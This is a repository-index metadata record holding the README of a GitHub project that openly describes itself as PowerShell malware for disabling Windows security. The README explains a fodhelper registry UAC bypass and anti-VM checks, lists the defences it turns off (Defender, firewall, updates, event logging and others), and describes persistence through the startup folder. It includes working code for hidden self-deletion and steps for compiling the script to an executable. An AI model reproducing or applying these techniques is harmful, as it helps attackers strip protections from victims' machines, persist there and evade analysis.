{"id":14980259,"url":"https://github.com/ispique/fuck-windows-security","last_synced_at":"2025-10-27T23:40:21.402Z","repository":{"id":246816707,"uuid":"822147833","full_name":"isPique/Fuck-Windows-Security","owner":"isPique","description":"A PowerShell malware that disables all the Windows Security features with UAC Bypass and Anti-VM features. (Designed to work both as a powershell script and as an executable (.exe) file.)","archived":false,"fork":false,"pushed_at":"2025-05-24T16:30:54.000Z","size":160,"stargazers_count":36,"open_issues_count":2,"forks_count":2,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-06-05T10:50:22.801Z","etag":null,"topics":["bypass-uac","defender-kill","disable-windows-defender","disable-windows-defender-permanently","disable-windows-services","disable-windows-update","powershell","powershell-malware","powershell-script","privesc","privilege-escalation","registry","uac-bypass"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/isPique.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-06-30T12:10:37.000Z","updated_at":"2025-05-26T06:41:50.000Z","dependencies_parsed_at":null,"dependency_job_id":"d1617dd8-6bd6-4ce8-ba88-7289d40726b5","html_url":"https://github.com/isPique/Fuck-Windows-Security","commit_stats":null,"previous_names":["ispique/fuck-windows-security"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/isPique/Fuck-Windows-Security","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/isPique%2FFuck-Windows-Security","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/isPique%2FFuck-Windows-Security/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/isPique%2FFuck-Windows-Security/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/isPique%2FFuck-Windows-Security/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/isPique","download_url":"https://codeload.github.com/isPique/Fuck-Windows-Security/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/isPique%2FFuck-Windows-Security/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281361405,"owners_count":26487881,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-27T02:00:05.855Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass-uac","defender-kill","disable-windows-defender","disable-windows-defender-permanently","disable-windows-services","disable-windows-update","powershell","powershell-malware","powershell-script","privesc","privilege-escalation","registry","uac-bypass"],"created_at":"2024-09-24T14:01:31.414Z","updated_at":"2025-10-27T23:40:21.396Z","avatar_url":"https://github.com/isPique.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003e [!CAUTION]\n\u003e ## MALWARE AHEAD! IF YOU DO NOT KNOW WHAT THAT IS, LEAVE.\n\u003cdiv align=center\u003e\n\n\u003cimg src=\"https://github.com/isPique/Fuck-Windows-Security/blob/main/disclaimer.png\" width=\"700\"\u003e\n\n\u003c/div\u003e\n\n\u003cbr\u003e\n\n\u003e [!WARNING]\n\u003e ***This script was NOT optimized to shorten and obfuscate the code but rather intended to have as much readability as possible for new coders to learn!***\n\n# How does it work?\n\n* Well, if we want to disable Windows's security features, we can use **Registry Editor** for that. However, we will need administrative privileges to access regedit. Like who's gonna run a malware as administrator?\n\n* First, the script will check if it is running in a virtual environment, if it is, it will delete itself.\n\n\u003e [!NOTE]\n\u003e The Anti-VM feature in this script was written by referencing the Metasploit's \"[checkvm](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb)\" module.\n\n| Currently Supported VMs | Status |\n|-------------------------|----------|\n| [Parallels](https://www.parallels.com) | Tested ✅ |\n| [Hyper-V](https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/about) | Tested ✅ |\n| [VMware](https://www.vmware.com) | Tested ✅ |\n| [VirutalBox](https://www.virtualbox.org) | Tested ✅ |\n| [Xen](https://xenproject.org) | Tested ✅ |\n| [QEMU/KVM](https://www.qemu.org) | Tested ✅ |\n    \n## Privilege Escalation\n  \n- In Windows, when a user is requesting to open **“Manage Optional Features”** in settings, a process is created under the name **“fodhelper.exe”**. This process is running with the highest privileges without any permissions being asked directly when executed because it's a trusted binary and signed by Microsoft.\n  \n- The following checks are performed in the registry upon start of **fodhelper.exe**:\n  \n\u003e ```plaintext\n\u003e HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command\n\u003e HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute\n\u003e HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command\\(default)\n\u003e ```\n  \n- Since these registry entries doesn’t exist, we can create this structure in the registry to manipulate fodhelper to execute our script with higher privileges bypassing the **User Account Control (UAC)**.\n  \n## Features that the script will disable:\n```bash\n\u003e All The Windows Defender Features (including SmartScreen)\n\u003e Windows Recovery Environment (WinRE)\n\u003e Windows Firewall\n\u003e Windows Update\n\u003e System Restore\n\u003e Task Manager\n\u003e OneDrive\n\u003e Cortana\n\u003e Command Prompt (Cmd)\n\u003e Remote Desktop\n\u003e User Account Control (UAC)\n\u003e Windows Security Center\n\u003e Windows Error Reporting\n\u003e Remote Assistance\n\u003e Windows Update Medic Service\n\u003e Background Intelligent Transfer Service (BITS)\n\u003e Windows Script Host\n\u003e Event Logging\n\u003e Windows Security Notifications\n\u003e Windows Search\n\u003e Automatic Maintenance\n\u003e Device Guard\n\u003e Application Guard\n\u003e Windows Defender Exploit Guard\n\u003e Telemetry and Data Collection\n```\n  \n## Self Replication \u0026 Self Destruction\n  \n* After disabling the Windows Security features, the script will copy itself to the startup folder with a random file name for persistence and will delete all traces of its execution.\n  \n* However, when the script is compiled and executed as an \".exe\" file, it becomes a process, and we can no longer modify or delete the file itself due to the **[File Locking Mechanism](https://en.wikipedia.org/wiki/File_locking)**.\n  \n* Since we couldn't delete the script itself after it has done its job, we have 2 alternatives to delete it:\n  \n```powershell\n$ScriptPath = $MyInvocation.MyCommand.Path\n$ExePath = (Get-Process -Id $PID).Path\n$FullPath = if ($ScriptPath) { $ScriptPath } else { $ExePath }\n  \n# First alternative: Start another process to delete it\nStart-Process powershell.exe -ArgumentList \"-NoProfile -Command `\"Remove-Item -Path '$FullPath' -Force -ErrorAction SilentlyContinue`\"\" -WindowStyle Hidden\n  \n# Second alternative: Create a temporary batch script to delete it\n$tempScript = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), [System.IO.Path]::GetRandomFileName() + \".cmd\")\n$cmdContent = \"chcp 1252\" + [Environment]::NewLine + \"ping 127.0.0.1 -n 2 \u003e nul\" + [Environment]::NewLine + \"del /q /f `\"$FullPath`\"\" + [Environment]::NewLine + \"del /q /f %~f0\"\nSet-Content -Path $tempScript -Value $cmdContent\nStart-Process cmd.exe -ArgumentList \"/c $tempScript\" -WindowStyle Hidden\n```\n\u003e ***The first alternative has been used in the script.***\n\n# How to convert the script into an executable?\n\n**1. Open PowerShell as administrator**\n\n**2. Install [PS2EXE](https://www.advancedinstaller.com/convert-powershell-to-exe)**\n\n  ```powershell\n  Install-Module ps2exe\n  ```\n\n**3. Open the GUI**\n\n  ```powershell\n  win-ps2exe\n  ```\n\n\u003e [!IMPORTANT]\n\u003e #### Once the script has been converted to an \".exe\" file, it can be flagged as:\n\u003e * [**Trojan:Win32/AgentTesla!ml**](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Trojan%3AWin32%2FAgentTesla!ml\u0026threatid=2147760503)\n\u003e * [**Trojan:Win32/Bearfoos.A!ml**](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Trojan%3AWin32%2FBearfoos.A!ml\u0026threatid=2147731250)\n\u003e * [**Trojan:Win32/Wacatac.B!ml**](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Trojan%3AWin32%2FWacatac.H!ml\u0026threatid=2147814523)\n\n\u003chr\u003e\n\n\u003e [!TIP]\n\u003e ### If you executed the script, you can also run the `Enable.reg` file to repair the damage it caused.\n\u003e And also open cmd as administrator then run this commmand to enable WinRE:\n```bash\nreagentc /enable\n```\n\n## Contributing\n\nI would really like to add an Escape-VM feature to this script, but it's a really complicated thing, soo if you wanna help me you can open a pull request :)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fispique%2Ffuck-windows-security","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fispique%2Ffuck-windows-security","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fispique%2Ffuck-windows-security/lists"}